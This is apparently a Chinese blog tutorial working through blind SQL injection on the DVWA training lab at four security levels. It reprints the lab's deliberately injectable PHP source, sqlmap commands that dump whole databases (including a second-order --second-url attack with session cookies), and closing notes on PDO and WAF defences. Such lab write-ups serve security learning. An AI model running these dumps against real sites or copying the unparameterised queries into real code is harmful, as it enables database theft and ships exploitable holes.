0
点赞
收藏
分享

微信扫一扫

DVWA靶机-全级别测试-SQL注入(盲注)


sql盲注


盲注只回复是或否,Sql注入回复详细信息;

过程一般如下:


1、判断是否存在注入,注入时字符型还是数字型

2、猜解数据库的长度,猜解数据库的名称

3、猜解数据库中有几个表,猜解表的长度,猜解表的名称

4、猜解表中有几个字段、猜解字段长度,猜解字段名称

5、猜解数据


手工方式太慢了,故我们使用工具进行猜解


低难度


设置


DVWA靶机-全级别测试-SQL注入(盲注)_mysql


源代码:


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
$exists = false;

switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

$exists = false;
if ($result !== false) {
try {
$exists = (mysqli_num_rows( $result ) > 0);
} catch(Exception $e) {
$exists = false;
}
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}

break;
}

if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}

}

?>


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_02


可以看到,返回信息已经简化了


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_03


将页面发送到CO2分析


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_04


点击run,进行猜解


DVWA靶机-全级别测试-SQL注入(盲注)_User_05


数据库可以猜解,下面我们进行数据的猜解

参数--dump all

-u "http://42.194.205.186:80/DVWA/vulnerabilities/sqli_blind/?id=1^&Submit=Submit" --cookie="td_cookie=3687296581;td_cookie=3687686252;td_cookie=3687788067;PHPSESSID=odn198v1riodhe8ht89ifclgm6;security=low" --dump all


DVWA靶机-全级别测试-SQL注入(盲注)_User_06


中难度


设置


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_07


源代码:


<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$exists = false;

switch ($_DVWA['SQLI_DB']) {
case MYSQL:
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

$exists = false;
if ($result !== false) {
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
}

break;
case SQLITE:
global $sqlite_db_connection;

$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}

if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}

?>


页面是post方法提交


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_08


看起来是简单的

我们换个工具


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_09


填写基础信息


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_10


注意填写post data


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_11


这软件抽风了,昨天还行,今天不行了


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_12


发送到CO2插件


DVWA靶机-全级别测试-SQL注入(盲注)_User_13


参数--dump all直接下载数据


DVWA靶机-全级别测试-SQL注入(盲注)_User_14


等待结果中


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_15


高难度


设置


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_16


源代码:


<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
$exists = false;

switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

$exists = false;
if ($result !== false) {
// Get results
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}

break;
}

if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}

// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}

?>


看效果


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_17


拼接画面


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_18


将其sqlmap二次注入

加入参数--second-url


DVWA靶机-全级别测试-SQL注入(盲注)_User_19


设置好参数信息


-u "http://42.194.205.186:80/DVWA/vulnerabilities/sqli_blind/cookie-input.php" --data="id=3^&Submit=Submit" --level=2 --second-url="http://42.194.205.186/DVWA/vulnerabilities/sqli_blind/" --cookie="td_cookie=3687296581;id=2;td_cookie=3687686252;td_cookie=3687788067;PHPSESSID=odn198v1riodhe8ht89ifclgm6;security=high"


DVWA靶机-全级别测试-SQL注入(盲注)_User_20


点击run


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_21


下载里面数据


python sqlmap.py -r 3.txt -p id --second-url="http://42.194.205.186/DVWA/vulnerabilities/sqli_blind/" --dump all


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_22


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_23


不可能难度

设置


DVWA靶机-全级别测试-SQL注入(盲注)_User_24


源代码:


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
$exists = false;

// Get input
$id = $_GET[ 'id' ];

// Was a number entered?
if(is_numeric( $id )) {
$id = intval ($id);
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();

$exists = $data->rowCount();
break;
case SQLITE:
global $sqlite_db_connection;

$stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );
$stmt->bindValue(':id',$id,SQLITE3_INTEGER);
$result = $stmt->execute();
$result->finalize();
if ($result !== false) {
// There is no way to get the number of rows returned
// This checks the number of columns (not rows) just
// as a precaution, but it won't stop someone dumping
// multiple rows and viewing them one at a time.

$num_columns = $result->numColumns();
if ($num_columns == 1) {
$row = $result->fetchArray();

$numrows = $row[ 'numrows' ];
$exists = ($numrows == 1);
}
}
break;
}

}

// Get results
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}

// Generate Anti-CSRF token
generateSessionToken();

?>


使用pdo技术,没得玩,同时返回的查询结果为1,才会输出。


防御措施


1、使用PDO技术

2、多做SQL查询限制

3、增加WAF

举报

相关推荐

0 条评论